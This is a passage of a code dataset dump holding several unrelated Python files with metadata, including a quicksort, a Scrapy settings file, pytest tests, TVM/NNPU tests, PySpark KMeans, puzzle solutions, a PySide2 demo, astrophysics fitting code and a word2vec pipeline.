f:\n\t\tjson.dump(data, f, indent=4)\n\n\ndef main():\t\n\tparser = argparse.ArgumentParser(description='Simplify Gent HTML files')\n\tparser.add_argument('--indir', help='Input directory', required=True)\n\tparser.add_argument('--outdir', help='Output directory', required=True)\n\t\n\targs = parser.parse_args()\n\t\n\tfor f in os.listdir(args.indir):\n\t\tckanparse(os.path.join(args.indir, f), os.path.join(args.outdir, f))\n\t\t\t\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"html/gent/gent-simplify.py","file_name":"gent-simplify.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"115583481","text":"from src.utils.swap import swap\n\n\ndef quick_sort(arr):\n return qs(arr, 0, len(arr) - 1)\n\n\ndef qs(arr, start, end):\n if (start < end):\n partitionIdx = partition(arr, start, end)\n\n qs(arr, start, partitionIdx - 1)\n qs(arr, partitionIdx + 1, end)\n\n return arr\n\n\ndef partition(arr, start, end):\n pivot = arr[end]\n partitionIdx = start\n\n for i in range(start, end):\n if arr[i] <= pivot:\n swap(arr, i, partitionIdx)\n partitionIdx += 1\n\n swap(arr, partitionIdx, end)\n\n return partitionIdx\n","sub_path":"src/sort/quick.py","file_name":"quick.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"313305289","text":"# -*- coding: utf-8 -*-\nfrom .user_agents import agents\n\nBOT_NAME = 'wuba'\n\nSPIDER_MODULES = ['wuba.spiders']\nNEWSPIDER_MODULE = 'wuba.spiders'\n\n\nROBOTSTXT_OBEY = False\n\nCOOKIES_ENABLED = False\n\n# USER_AGENT = agents\n\nDOWNLOAD_DELAY = 1 # 延迟\n\n# LOG_LEVEL = 'INFO' # 日志级别\n\nITEM_PIPELINES = {\n 'wuba.pipelines.WubaPipeline': 300,\n}\n# # 配置redis\n# SCHEDULER = \"scrapy_redis.scheduler.Scheduler\" #调度\n# DUPEFILTER_CLASS = \"scrapy_redis.dupefilter.RFPDupeFilter\" #去重\n# SCHEDULER_PERSIST = True #不清理Redis队列\n# SCHEDULER_QUEUE_CLASS = \"scrapy_redis.queue.SpiderQueue\" #队列\n\n#配置MongoDB\nMONGODB_HOST = '127.0.0.1'\nMONGODB_PORT = 27017\nMONGODB_DBNAME = \"wuba\"\nMONGODB_DOCNAME = \"zufang\"\n\n# # 配置redis\n# REDIS_HOST = '192.168.1.199'\n# REDIS_PORT = 6379\n","sub_path":"wuba/wuba/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"70318360","text":"from pytest import fixture\nimport json\n\n\n@fixture(scope=\"session\")\ndef feedback():\n with open(\"feedback.jsonc\", \"r\") as handle:\n fixed_json = \"\".join(\n line for line in handle if not line.strip().startswith(\"//\")\n )\n return json.loads(fixed_json)\n\n\ndef test_dar_uma_nota_de_0_a_10_ao_projeto(feedback):\n nota = feedback.get(\"nota\")\n assert type(nota) is int\n assert 0 <= nota <= 10\n\n\ndef test_falar_dos_pontos_positivos(feedback):\n comentario = feedback.get(\"pontos_positivos\")\n assert type(comentario) is not None\n assert comentario.strip() != \"\"\n\n\ndef test_falar_dos_pontos_negativos(feedback):\n comentario = feedback.get(\"pontos_negativos\")\n assert type(comentario) is not None\n assert comentario.strip() != \"\"\n","sub_path":"tests/test_feedback.py","file_name":"test_feedback.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"342909611","text":"import nnpu\nimport tvm\nimport topi\nfrom nnpu.utils import ScheduleProcHelper\nimport numpy as np\n\nimport argparse\n\nparser = argparse.ArgumentParser(description='test of NNPU Op')\nparser.add_argument('--sim', type=str, help='the simulator to use', \n default='S0', choices=['S0', 'S1', 'SC'])\nargs = parser.parse_args()\n\nenv = nnpu.get_env()\nnnpu.set_device(env, type=args.sim)\n\nwith ScheduleProcHelper():\n env = nnpu.get_env()\n shape = (48, 48)\n insn_shape = (16, 16)\n\n dtype_n, dtype_w = env.cfg['dtype_n'], env.cfg['dtype_w']\n a = tvm.placeholder(shape, dtype_n, 'a')\n b = tvm.placeholder(shape, dtype_n, 'b')\n \n sph = ScheduleProcHelper.current\n\n a_buf, a_dram = nnpu.utils.CopyHtoBuf(a, 'a', sph)\n b_buf, b_dram = nnpu.utils.CopyHtoBuf(b, 'b', sph)\n\n k = tvm.reduce_axis((0, shape[1]), 'k')\n dot_shape = (shape[0], )\n dot_buf = tvm.compute(dot_shape, \n lambda i: tvm.sum(a_buf[i, k].astype(dtype_w) * \n b_buf[i, k].astype(dtype_w), k), \n 'dot_buf')\n sph.MarkScope(dot_buf, 'acc')\n \n res_buf = nnpu.utils.CopyAccToBuf(dot_buf, 'res')\n \n res_host, _ = nnpu.utils.CopyBufToH(res_buf, 'res')\n\n # tensorize\n s = nnpu.create_schedule(res_host.op)\n xo, ro, xi, ri = s[dot_buf].tile(dot_buf.op.axis[0], dot_buf.op.reduce_axis[0],\n insn_shape[0], insn_shape[1])\n s[dot_buf].tensorize(xi, env.intrins.get('MRowDot', shape=insn_shape, \n mode='inc', scope_out='acc'))\n\n print(nnpu.lower(s, [a, b, res_host], simple_mode=True))\n \n func = nnpu.build(s, [a, b, res_host], 'nnpu', 'llvm', name='nnpu_func')\n\n print('------------------- device module 1 asm code: ')\n print(func.imported_modules[0].get_source('asm'))\n \n ctx = tvm.nd.TVMContext(13, 0)\n\n a_np = np.random.randint(size=shape, dtype=a.dtype, low = -32, high = 32)\n #a_np = np.random.random(size=shape).astype(a_host.dtype)\n a_nd = tvm.nd.array(a_np, ctx)\n\n b_np = np.random.randint(size=shape, dtype=b.dtype, low = -32, high = 32) \n b_nd = tvm.nd.array(b_np, ctx)\n c_nd = tvm.nd.array(np.zeros((shape[0], )).astype(res_host.dtype), ctx)\n\n func(a_nd, b_nd, c_nd)\n #print('a = ')\n #print(a_np)\n #print('b = ')\n #print(b_np)\n\n print(c_nd.asnumpy())\n print('ground truth is')\n gt = np.multiply(a_np, b_np, dtype=res_host.dtype)\n gt = np.sum(gt, axis=1)\n print(gt)\n np.testing.assert_allclose(c_nd.asnumpy(), gt)\n print('test passed')","sub_path":"nnpu/tests/test_strided/test_strided_mat_row_dot.py","file_name":"test_strided_mat_row_dot.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"83732581","text":"from pyspark import SparkContext\nfrom pyspark.mllib.feature import HashingTF\nfrom pyspark.mllib.feature import IDF\nfrom pyspark.mllib.linalg import Vectors\nfrom pyspark.mllib.clustering import KMeans, KMeansModel\nfrom numpy import array\nfrom math import sqrt\n\ndef createKmeansVector(vector):\n\tparsedData = [0 for i in range(45000)]\n\tvectorSplit = vector.split(';')\n\tfor vs in vectorSplit:\n\t\tvSplit = vs.split(' ')\n\t\tparsedData[int(vSplit[0])] = float(vSplit[1])\n\treturn parsedData\n\nsc = SparkContext()\nparsedData = sc.textFile(\"hdfs://localhost:8020/pyspark/vector\")\\\n\t.map(lambda x: x.split(':'))\\\n\t.map(lambda x:createKmeansVector(x[1]))\n\t\nclusters = KMeans.train(parsedData, 10, maxIterations=10, runs=10, initializationMode=\"random\")\t\n\nclusters.save(sc, \"myModelPath\")\nsameModel = KMeansModel.load(sc, \"myModelPath\")\n\ndef error(point):\n center = sameModel.centers[sameModel.predict(point)]\n return sqrt(sum([x**2 for x in (point - center)]))\n\nWSSSE = parsedData\\\n\t.map(lambda point: error(point))\\\n\t.reduce(lambda x, y: x + y)\nprint(\"Within Set Sum of Squared Error = \" + str(WSSSE))\n\n#print(parsedData.collect()[1])","sub_path":"reishi_batch/pyspark/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"463006172","text":"#!/usr/bin/env python3\n\nimport sys\nimport os.path\n\ndef bankWithMostBlocks(banks):\n return sorted(list(banks.items()), key=lambda e: e[1], reverse=True)[0][0]\n\ndef main(data):\n dataLength = len(data)\n configurations = set()\n configuration = tuple(list(data.values()))\n\n while configuration not in configurations:\n configurations.add(configuration)\n bankIdx = bankWithMostBlocks(data)\n blocksToRedistribute = data[bankIdx]\n data[bankIdx] = 0\n while blocksToRedistribute > 0:\n bankIdx = (bankIdx + 1) % dataLength\n data[bankIdx] += 1\n blocksToRedistribute -= 1\n configuration = tuple(list(data.values()))\n\n counter = 0\n configTarget = configuration\n\n while True:\n if configuration == configTarget and counter > 0:\n break\n counter += 1\n bankIdx = bankWithMostBlocks(data)\n blocksToRedistribute = data[bankIdx]\n data[bankIdx] = 0\n while blocksToRedistribute > 0:\n bankIdx = (bankIdx + 1) % dataLength\n data[bankIdx] += 1\n blocksToRedistribute -= 1\n configuration = tuple(list(data.values()))\n\n return counter\n\nif __name__ == '__main__':\n testVectors = [\n ({0: 0, 1: 2, 2: 7, 3: 0}, 4),\n ]\n\n testResults = [ main(ti[0]) == ti[1] for ti in testVectors ]\n if all(testResults):\n print(\"All tests passed!\")\n inputFile = os.path.join(\n os.path.dirname(\n os.path.dirname(\n os.path.abspath(sys.argv[0])\n )\n ), 'input'\n )\n if os.path.isfile(inputFile):\n with open(inputFile, 'r') as fh:\n inputData = fh.read()\n inputData = inputData.strip()\n inputData = { i: int(e) for i, e in enumerate( inputData.split() ) }\n print(main(inputData))\n else:\n print(\"Input file not found\")\n else:\n print(testResults)\n print(main({0: 0, 1: 2, 2: 7, 3: 0}))\n","sub_path":"06/python/AoC_6b.py","file_name":"AoC_6b.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"15956630","text":"\"\"\"\nhttps://www.qt.io/qt-for-python\npyside2 is official interface\n\nsudo pacman -S pyside2\n\n\"\"\"\n\nfrom PySide2 import QtCore, QtWidgets, QtGui\nimport random\nimport sys\n\n\nclass MyWidget(QtWidgets.QWidget):\n def __init__(self):\n QtWidgets.QWidget.__init__(self)\n self.hello = ['a', 'b', 'c']\n self.button = QtWidgets.QPushButton('click me')\n self.text = QtWidgets.QLabel('hello world')\n self.text.setAlignment(QtCore.Qt.AlignCenter)\n self.layout = QtWidgets.QVBoxLayout()\n self.layout.addWidget(self.text)\n self.layout.addWidget(self.button)\n self.setLayout(self.layout)\n self.button.clicked.connect(self.magic)\n\n def magic(self):\n self.text.setText(random.choice(self.hello))\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n widget = MyWidget()\n widget.show()\n sys.exit(app.exec_())\n","sub_path":"default_qt.py","file_name":"default_qt.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"139175236","text":"import random\nimport time\n\n# check if target in muyList\ndef inList(myList, target): \n for i in myList: \n if (i == target): \n return True\n return False\n\n# print a multiplication between i and j \ndef printQuestion(i, j):\n print(\"What is\", i, \" x \", j, \" ?\") \n\n\n# print possible answers \ndef printOptions(myList): \n for i in range(len(myList)): \n print(chr((ord('a') + i)), myList[i])\n\n\ndef answerList(number, myList): \n result = []\n for i in myList: \n result.append(number * i)\n return result\n\n# return a list of possible answer \ndef createOption(i, j): \n result = []\n result.append(i*j)\n for duration in range(3):\n temp = random.randint(1,9)\n\n while(True):\n temp = random.randint(1,9)\n if inList(result, temp):\n continue\n break\n result.append(i * temp) \n return result \n\ndef checkAnswer(myAnswerIndex, myList, number, target):\n if myList[myAnswerIndex] == number * target:\n return True\n return False\n\n\n\n\nprint(\"Welcome to Multiplication Game\")\nprogress = [ [0 for i in range(9)] for j in range(9)] \nwhile(True):\n number = input(\"Which number do you want to learn? \")\n number = int(number)\n if number <0 or number > 9: \n print(\"Please input number from 1 to 9\")\n continue\n break \ntime.sleep(1)\n\nprint(\"Are you ready?\")\nfromZeroToNine = list(range(0,9))\nrandom.shuffle(fromZeroToNine)\nfor i in fromZeroToNine:\n options = createOption(number, i)\n random.shuffle(options)\n printQuestion(number, i)\n printOptions(options)\n your_answer= input(\"What is the correct answer? a, b, c ,d\")\n your_answer_index = ord(your_answer) - ord('a')\n #print (\"*****\",your_answer_index)\n if (checkAnswer(your_answer_index, options, number, i)):\n print(your_answer ,\"That's the correct answer \")\n else:\n print(your_answer, \"Sorry, This is not correct\")\n print(\"***************************\")\n print()\n\n\n\n\n\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"243762456","text":"\"\"\"\nMaximisation step: Fit a component to the data: Find parameters of the\ncomponent at birth time that fit the data today.\n\nThis requires the component propagation in time.\n\n\"\"\"\n\nimport numpy as np\nimport scipy.optimize\n\n#~ from chronostar import likelihood2\nfrom chronostar.component import SphereComponent\n\ntry:\n #TODO age consideration parameter from .pars file\n age_parameter=False\n if age_parameter:\n from chronostar.likelihood import lnprob_func_gradient_descent\n else:\n from chronostar._likelihood import lnprob_func_gradient_descent\n #TODO from NS, what is _likelihood compared to likelihood.py? \n # Will _likelihood go around the likelihood_w_ages, leaving the age \n # consideration out of the mximisation step?\nexcept ImportError:\n print(\"C IMPLEMENTATION OF lnprob_func_gradient_descent NOT IMPORTED\")\n USE_C_IMPLEMENTATION = False\n TODO = True # NOW WHAT?\n\ndef fit_single_comp_gradient_descent_serial(data, memb_probs=None, \n init_pars=None, Component=SphereComponent, \n convergence_tol=1, optimisation_method='Nelder-Mead'):\n \"\"\"\n Write docs...\n \"\"\"\n\n #~ print('init_pars', init_pars)\n\n init_age = init_pars[-1]\n age_offsets = [-9, -4, -0.4, -0.2, -0.5, 0., 0.1, 0.3, 0.5, 5., 10., 20., 40.]\n #~ age_offsets = [-9, -4, -0.4, -0.2, -0.5, 0., 0.1, 0.3, 0.5, 5., 10., 20., 40.]\n #~ age_offsets = [0., 10.] # for testing\n init_ages = np.abs([init_age + age_offset for age_offset in age_offsets])\n init_guess_comp = Component(emcee_pars=init_pars)\n # Age split hardcoded!\n init_guess_comps = init_guess_comp.split_group_ages(init_ages)\n init_pos = [c.get_emcee_pars() for c in init_guess_comps]\n \n\n # Prepare data: exclude non-members\n # This is the required C format\n a = []\n memb_threshold=1e-5\n nearby_star_mask = np.where(memb_probs > memb_threshold)\n for i in nearby_star_mask[0]:\n tmp = np.hstack((data['means'][i], data['covs'][i].flatten(), memb_probs[i]))\n a.append(tmp)\n a=np.array(a)\n\n return_dict={}\n for i in range(len(init_pos)):\n #~ print('init_pos[%d]'%i, init_pos)\n #~ print('optimisation_method', optimisation_method)\n result = scipy.optimize.minimize(lnprob_func_gradient_descent, \n init_pos[i], args=a, \n tol=convergence_tol, method=optimisation_method)\n return_dict[i] = result\n\n\n keys = list(return_dict.keys()) # Keep the keys so you always have the same order\n result_fun = [[k, return_dict[k].fun] for k in keys]\n result_fun_sorted = sorted(result_fun, key=lambda x: x[1])\n best_key = result_fun_sorted[0][0]\n best_result = return_dict[best_key]\n\n # Identify and create the best component (with best lnprob)\n best_component = Component(emcee_pars=best_result.x)\n \n return best_component, best_result.x, -best_result.fun # Check if really minus. Minus is already in the likelihood...\n\n\ndef maximisation_gradient_descent_serial(data, ncomps=None, \n memb_probs=None, all_init_pars=None, all_init_pos=None,\n convergence_tol=1, Component=SphereComponent,\n optimisation_method='Nelder-Mead', \n idir=None):\n \"\"\"\n What is idir?\n \"\"\"\n \n \"\"\"\n I get lots pf pickling errors.\n \n From stackoverflow:\n \n The multiprocessing module has a major limitation when it comes to IPython use:\n\n Functionality within this package requires that the __main__ module be importable by the children. [...] This means that some examples, such as the multiprocessing.pool.Pool examples will not work in the interactive interpreter. [from the documentation]\n\n Fortunately, there is a fork of the multiprocessing module called multiprocess which uses dill instead of pickle to serialization and overcomes this issue conveniently.\n\n Just install multiprocess and replace multiprocessing with multiprocess in your imports\n \"\"\"\n \n return_dict={}\n for i in range(ncomps):\n best_comp, final_pos, lnprob =\\\n fit_single_comp_gradient_descent_serial(data=data, \n memb_probs=memb_probs[:, i],\n convergence_tol=convergence_tol,\n #~ init_pos=all_init_pos[i],\n init_pars=all_init_pars[i], Component=Component,\n #~ trace_orbit_func=trace_orbit_func,\n optimisation_method=optimisation_method, # e.g. Nelder-Mead\n )\n return_dict[i] = [best_comp, lnprob, final_pos]\n\n\n\n new_comps_list = [return_dict[i][0] for i in range(ncomps)]\n all_lnprob = [return_dict[i][1] for i in range(ncomps)]\n all_final_pos = [return_dict[i][2] for i in range(ncomps)]\n\n return new_comps_list, all_lnprob, all_final_pos\n\n\ndef maximisation_gradient_descent_multiprocessing(data, ncomps=None, \n memb_probs=None, all_init_pars=None, all_init_pos=None,\n convergence_tol=1, Component=SphereComponent,\n optimisation_method='Nelder-Mead', \n idir=None):\n \"\"\"\n What is idir?\n \"\"\"\n \n \"\"\"\n I get lots pf pickling errors.\n \n From stackoverflow:\n \n The multiprocessing module has a major limitation when it comes to IPython use:\n\n Functionality within this package requires that the __main__ module be importable by the children. [...] This means that some examples, such as the multiprocessing.pool.Pool examples will not work in the interactive interpreter. [from the documentation]\n\n Fortunately, there is a fork of the multiprocessing module called multiprocess which uses dill instead of pickle to serialization and overcomes this issue conveniently.\n\n Just install multiprocess and replace multiprocessing with multiprocess in your imports\n \"\"\"\n print('IN maximisation_gradient_descent_multiprocessing')\n \n manager = multiprocessing.Manager()\n return_dict = manager.dict()\n \n #~ global worker # should solve pickle error in ipython, but it doesn't\n \n #~ return_dict={}\n #~ for i in range(ncomps):\n #~ best_comp, final_pos, lnprob =\\\n #~ fit_single_comp_gradient_descent_serial(data=data, \n #~ memb_probs=memb_probs[:, i],\n #~ convergence_tol=convergence_tol,\n #init_pos=all_init_pos[i],\n #~ init_pars=all_init_pars[i], Component=Component,\n #trace_orbit_func=trace_orbit_func,\n #~ optimisation_method=optimisation_method, # e.g. Nelder-Mead\n #~ )\n #~ return_dict[i] = [best_comp, lnprob, final_pos]\n\n\n\n\n def worker(i, return_dict):\n best_comp, final_pos, lnprob =\\\n fit_single_comp_gradient_descent_serial(data=data, \n memb_probs=memb_probs[:, i],\n convergence_tol=convergence_tol,\n init_pars=all_init_pars[i], Component=Component,\n optimisation_method=optimisation_method, # e.g. Nelder-Mead\n )\n\n return_dict[i] = [best_comp, lnprob, final_pos]\n\n\n\n\n jobs = []\n for i in range(ncomps):\n process = multiprocessing.Process(target=worker, \n args=(i, return_dict))\n jobs.append(process)\n\n # Start the processes\n for j in jobs:\n j.start()\n\n # Ensure all of the processes have finished\n for j in jobs:\n j.join()\n\n\n print('END maximisation_gradient_descent_multiprocessing')\n\n\n\n new_comps_list = [return_dict[i][0] for i in range(ncomps)]\n all_lnprob = [return_dict[i][1] for i in range(ncomps)]\n all_final_pos = [return_dict[i][2] for i in range(ncomps)]\n\n return new_comps_list, all_lnprob, all_final_pos\n","sub_path":"chronostar/maximisationC.py","file_name":"maximisationC.py","file_ext":"py","file_size_in_byte":7549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"420781356","text":"#!/usr/bin/env python\n\n#CodeWars 2014\n#\n#Goldbach's Conjecture\n\n# Goldbach's conjecture says that every positive even number greater than 2 is \n# the sum of two prime numbers. This conjecture has never been proven in the \n# general case, but it has been confirmed for numbers much larger than \n# your programming environment's native data type supports.\n#\n# Write a program to print the two prime numbers that sum to a given even integer.\n# Find the two primes with the smallest difference\n#\n# Input\n#\n# Each line of input will be a positive, even integer greater than two, \n# except the last line, which will be zero. The maximum input value will be 1000.\n#\n# 28\n# 992\n# 16\n# 0\n# \n\nimport sys\nfrom math import sqrt\n\ndef isprime(value):\n for divisor in range (2, int(sqrt(value))+1):\n if (value/divisor == int(value/divisor)):\n return 0\n return 1\n\nprint (\"Enter even numbers. 0 to end.\")\nfor line in sys.stdin:\n total = int(line)\n lowestDiff=total\n if (total == 0):\n break\n for low in range(3, int((total/2)+1)):\n if (isprime(low)==1):\n high = total-low\n if (isprime(high)==1):\n # Found an answer. Update if lowest answer is found.\n if (high-low < lowestDiff):\n lowestDiff = high-low\n bestLow = low\n bestHigh = high\n print (bestLow, \"+\", bestHigh, \"=\", total)\n\n","sub_path":"codewars/2014/SampleSolutions2014/prob09_Goldbach.py","file_name":"prob09_Goldbach.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"246839822","text":"import visualization\nimport xyPlot\nimport displayGroupOdbToolset as dgo\nimport os, glob, inspect\nimport sys\nsys.path.append('C:\\\\Users\\\\doktor\\\\PycharmProjects\\\\InputFilesBuild - Copy')\nimport globalPar as gp\nreload(gp)\n\npath = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))) +'\\\\workingDirectory\\\\'\nos.chdir(path)\n\ngp.scandirs(path)\n\n#odbKeysList = ['SDV11', 'SDV_EE11', 'SDV_EE12', 'SDV_EE13', 'SDV_EE22', 'SDV_EE23', 'SDV_EE33', 'SDV_EP11', 'SDV_EP12',\n# 'SDV_EP13', 'SDV_EP22', 'SDV_EP33', 'SDV_PEEQ', 'SDV_TEP']\n\n\npc = gp.ParametersClass()\nsemicolon =';'\ncomma = ','\n\n# Header\ndispFile_to_view = open('db_to_view_FFT.csv', 'a')\nfile = glob.glob(\"*.odb\")[0]\no1 = session.openOdb(name=path + file)\nodb = session.odbs[path + file]\nstep = odb.steps['Step-1']\n\nodbLabels = gp.get_labels(step)\n\n#Header - only on file initialization\ndispFile_to_view.write('id' + semicolon + 'delta' + semicolon + 'alpha' + semicolon + 'velocity' + semicolon + 'time'\n + semicolon + 's' + semicolon + 'Tm' + semicolon + 'm')\n#Header - only on file initialization\n\nfor key in odbLabels.keys():\n if not odbLabels[key]['labels']:\n dispFile_to_view.write(semicolon + str(key))\n #dispFile.write(comma + str(key))\n else:\n for label in odbLabels[key]['labels']:\n dispFile_to_view.write(semicolon + str(label))\n #dispFile.write(comma + str(label))\nodb.close()\n\n\nfor file in glob.glob(\"*.odb\"):\n print(file)\n o1 = session.openOdb(name=path + file)\n odb = session.odbs[path + file]\n step = odb.steps['Step-1']\n\n #odbLabels = gp.get_labels(step)\n\n # Data rows\n alpha, Dxx = gp.get_additional_parameters(file)\n print(alpha)\n time = pc.s / pc.velocity ##velocity in mm/s\n\n for id, frame in enumerate(step.frames):\n dispFile_to_view.write('\\n' + str(id) + semicolon + str(Dxx) + semicolon + str(alpha) + semicolon +\n str(pc.velocity) + semicolon + str(time) + semicolon + str(pc.s) + semicolon + str(pc.Tm) + semicolon + str(pc.m))\n\n for key in odbLabels.keys():\n if not odbLabels[key]['labels']:\n dispFile_to_view.write(semicolon + str(frame.fieldOutputs[key].values[0].data))\n\n else:\n for label in odbLabels[key]['labels']:\n if key == 'S':\n dispFile_to_view.write(semicolon + str(frame.fieldOutputs[key].getScalarField(componentLabel=label).values[0].data))\n else:\n dispFile_to_view.write(semicolon + str(frame.fieldOutputs[key].getScalarField(componentLabel=label).values[7].data))\n odb.close()\n\ndispFile_to_view.close()","sub_path":"OLD_code/OLD_3_1_abaqus_OdbReader.py","file_name":"OLD_3_1_abaqus_OdbReader.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"616397321","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Aug 2 00:36:13 2015\n\n@author: Евгений\n\"\"\"\n\ndef push_annual(cursor, var_name, year, val):\n cursor.execute(\"INSERT OR REPLACE INTO annual VALUES (?, ?, ?)\", (var_name, year, val))\n\ndef push_quarter(cursor, var_name, year, quarter, val):\n cursor.execute(\"INSERT OR REPLACE INTO quarter VALUES (?, ?, ?, ?)\", (var_name, year, quarter, val))\n\ndef push_monthly(cursor, var_name, year, month, val):\n cursor.execute(\"INSERT OR REPLACE INTO monthly VALUES (?, ?, ?, ?)\", (var_name, year, month, val))\n\n\nimport sqlite3\nconn = sqlite3.connect('kep.sqlite')\nc = conn.cursor()\n\n# Insert a row of data\nc.execute(\"INSERT OR REPLACE INTO annual VALUES (?, ?, ?)\", ('153', 1000, 0))\n\nc.executescript(\"\"\"\nDELETE FROM \"main\".\"quarterly\";\nDELETE FROM \"main\".\"monthly\";\nDELETE FROM \"main\".\"annual\";\n\"\"\")\n\n# Save (commit) the changes\nconn.commit()\n\n# We can also close the connection if we are done with it.\n# Just be sure any changes have been committed or they will be lost.\n\n\n\n\nimport sqlite3\n\ndef wipe_db_tables():\n conn = sqlite3.connect('kep.sqlite')\n c = conn.cursor()\n c.executescript(\"\"\"\n DELETE FROM \"main\".\"quarterly\";\n DELETE FROM \"main\".\"monthly\";\n DELETE FROM \"main\".\"annual\";\n \"\"\")\n conn.commit()\n conn.close()","sub_path":"src/abandoned/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"451759151","text":"#!/bin/env python2.7\n\"\"\"\nrun_w2v_pipeline.py\n\nA script for running all of the analysis in the Word2Vec/Kmeans\npipeline and saving results to a given directory path.\nThis may also be used as an example if you wish to do it by hand.\n\nEstimated running time for the whole dataset is on the order of 8 hours\nas of March 2015\n\"\"\"\nimport os\nthis_dir, _ = os.path.split(__file__)\nimport sys\nsys.path.append('/'.join(['../../', this_dir])) # Add the previous directory to the path (just a clooj for now)\nimport logging\nimport datetime\nimport numpy as np\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO) #Set up logging\nfrom pymongo import MongoClient\nfrom pprint import pprint, pformat\nfrom sklearn.externals import joblib\n\nfrom jmAlife.txtMine import * # get my utility files. Automatically loads stoplist into the namespace. \n\n## GLOBAL VARIABLES\nc = MongoClient()\n\ndef main(coll, num_pats, model_type, vec_size, num_clusters, phrase_size, dest_dir):\n # Local Vars\n start = datetime.datetime.now()\n USE_GENERATORS = False\n \n\n # Get the appropriate patent cursor\n pats = c.patents.pat_text.find()\n if coll == \"patns\":\n pats = c.patents.patns.find()\n elif coll == \"pat_text\":\n pass\n else: \n sys.exit(\"%s collection not currently supported.\" %coll)\n\n TOTAL_PATS = pats.count()\n N = TOTAL_PATS\n\n # If input number of pats appropriate, take that number from the cursor.\n \"\"\"\n if num_pats < N and num_pats > 0:\n N = num_pats\n if N > 500000:\n USE_GENERATORS = True\n \"\"\"\n\n if model_type != \"d2v\" and model_type != \"w2v\":\n sys.exit(\"This model not currently supported. Enter 'W2V' for word2vec and 'D2V' for doc2vec\")\n\n logging.info(\"Running your %s/cluster job with vec_size %d and %d clusters. Preprocessing %d patents from %s with %d-grams\" \n %(model_type, vec_size, num_clusters, N, coll, phrase_size))\n \n if N != TOTAL_PATS:\n pats = util.take(N, pats)\n\n # Get gensim objects\n logging.info(\"Getting %d sentences...\" %N)\n ls = util.quick_labeled_sentences(list(pats), stoplist, False, phrase_size)\n logging.info(\"Length of labeled sentences is {}\".format(len(ls)))\n \n logging.info(\"Fitting %s model on %d patents...\" %(model_type, N))\n if model_type == \"d2v\":\n # Run d2v analysis and get word vectors\n model = util.get_d2v(ls, vec_size = vec_size, workers = 1)\n word_vecs, doc_vecs, indices = util.partition(model)\n word2index, doc2index = indices\n elif model_type == \"w2v\":\n # run w2v analysis and get word_vectors\n sentences = map(lambda x: x.words, ls)\n logging.info(\"In line before word2vec is fit, sentences has length {}\".format(len(sentences)))\n model = util.get_w2v(sentences, vec_size, workers = 1)\n word_vecs = model.syn0\n word2index = {word: index for (index, word) in enumerate(model.index2word)}\n else:\n raise RuntimeError(\"Internal Error. Invalid model_type %s\" %model_type)\n \n # Get Filenames\n model_ext = '.word2vec'\n if model_type == 'd2v':\n model_ext = '.doc2vec'\n model_fn = '/'.join([dest_dir, ''.join([model_type,str(vec_size),model_ext])])\n kmeans_fn = '/'.join([dest_dir, ''.join(['kmeans', str(num_clusters), '.pkl'])])\n cluster_parse_fn = '/'.join([dest_dir, 'parsed_clusters.npy'])\n\n logging.info(\"Saving Model to disk in %s\" %dest_dir)\n model.save(model_fn)\n\n # run cluster analysis\n logging.info(\"Getting %d clusters for %d words...\" %(num_clusters, len(word_vecs)))\n kmeans = util.get_kmeans(word_vecs, K = num_clusters)\n parsed_clusters = util.parse_clusters(kmeans, model)\n logging.info(\"Parsed Clusters: %s\" %pformat(parsed_clusters))\n\n # TODO - Get document representations and save them to disk too. \n\n # save to disk\n logging.info(\"Saving Kmeans to disk in %s\" %dest_dir)\n joblib.dump(kmeans, kmeans_fn)\n np.save(cluster_parse_fn, parsed_clusters)\n\n end = datetime.datetime.now()\n logging.info(\"Done. Time elapsed: %s\"%util.strfdelta(end - start, \"{days}d,{hours}h,{minutes}m,{seconds}s\"))\n\nif __name__ == \"__main__\":\n # Handle Command Line Args\n if len(sys.argv) != 8:\n sys.exit(\"Usage: python %s <'W2V' or 'D2V'> \" %sys.argv[0])\n coll = sys.argv[1]\n num_patents = int(sys.argv[2])\n model_type = sys.argv[3].lower()\n vec_size = int(sys.argv[4])\n num_clusters = int(sys.argv[5])\n phrase_size = int(sys.argv[6])\n destination_dir = sys.argv[7]\n main(coll, num_patents, model_type, vec_size, num_clusters, phrase_size, 